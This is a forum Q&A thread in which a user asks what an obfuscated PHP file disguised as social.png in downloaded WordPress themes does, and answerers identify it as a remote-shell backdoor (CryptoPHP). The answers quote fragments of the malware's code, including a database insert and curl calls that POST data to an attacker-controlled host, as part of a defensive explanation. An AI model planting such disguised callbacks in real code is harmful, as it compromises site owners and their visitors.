2

I have download some Wordpress themes from a website and I have noticed a strange include to social.png file. Looking at this file this is not a real png file but a php script that contains difficult to understand obfuscated code and is the same also for many wordpress plugin distributed from other sites.

The file size is 45 kb and have this hash 3FFC93695CA3C919F36D52D07BDB5B198E7C6D63

Someone have an idea of the function of this file?

THIS is the file

AndreaF
  • 11,975
  • 27
  • 102
  • 168

3 Answers3

7

According to this forum post:

Basically, it is a remote shell callback that uses public key encryption to only allow to hacker to run code on your server. It generates a per-install RSA key pair, uploads it to the command server (which it has a preseeded list of, but can dynamically update from other infected hosts to avoid being shut down) using an embedded key and also sends through a list of capabilities (eval/exec enabled, server information) and emails it through to a list of emails found in the file.

It's using Wordpress's config system to store its data, so have a look in your database for a setting key called WP_CLIENT_KEY which will look like a bunch of garbled text.

Once active, the exploit will take a list of commands to eval on the server - probably more shells or exploits, and also inject strings into the page footer. These strings are probably blackhat SEO spam, but it also injects a list of command and control servers that it is on contact with aswell - so any other infected sites will be using your server to find others.

As I noted in the comments, the script will update and store data in the WP database:

$AKorMlJxhsFuVmuppepc->setQuery("INSERT INTO #__options(option_name, value) values ('{$zgWyMIVCeKwSmjusORA}' , '{$ytnxJjQqCvGdNRBKCigc}')");
...

Which as the forum post pointed out, is for the script's own access. The script also sends data, presumably the public key, to a specified server through a shell POST request:

curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_URL, "http://$gXNjWLFkUQOugyREMXKv");
curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_RETURNTRANSFER, 1);
@curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_FOLLOWLOCATION, true);
if (isset($WbKPQMoSbMZkXUeYKXRI)) {
    curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_CUSTOMREQUEST, "POST");
    curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_POSTFIELDS, $WbKPQMoSbMZkXUeYKXRI);
}

Regardless of the exact purpose of the script, you should delete all references of it, and attempt to rid yourself of the script completely.

Community
  • 1
  • 1
Charlie
  • 11,380
  • 19
  • 83
  • 138
  • How to clear this completely?! means except plugin folder, how to remove all rows that created by this in db. – Dr.jacky Nov 26 '14 at 13:33
2

It is WordPress hacking trick via false png images. Be careful!

Dipak G.
  • 715
  • 1
  • 4
  • 18
  • Which makes a `CURL` request posting whatever data to the URL stored in the `$gXNjWLFkUQOugyREMXKv` variable, which would be hard to determine without running the script and echoing the created URL... – Charlie Jul 26 '14 at 05:17
  • It also attempts to modify some database. – Charlie Jul 26 '14 at 05:18
0

@AndreaF - Shocking really? The social.png CryptoPHP hacker file is only in pirated/stolen software (plugins, themes, etc). This type of Trojan horse hacking has been going on forever. If you try to get something pirated/stolen for free then expect to suffer the consequences.

Ed-AITpro
  • 310
  • 1
  • 8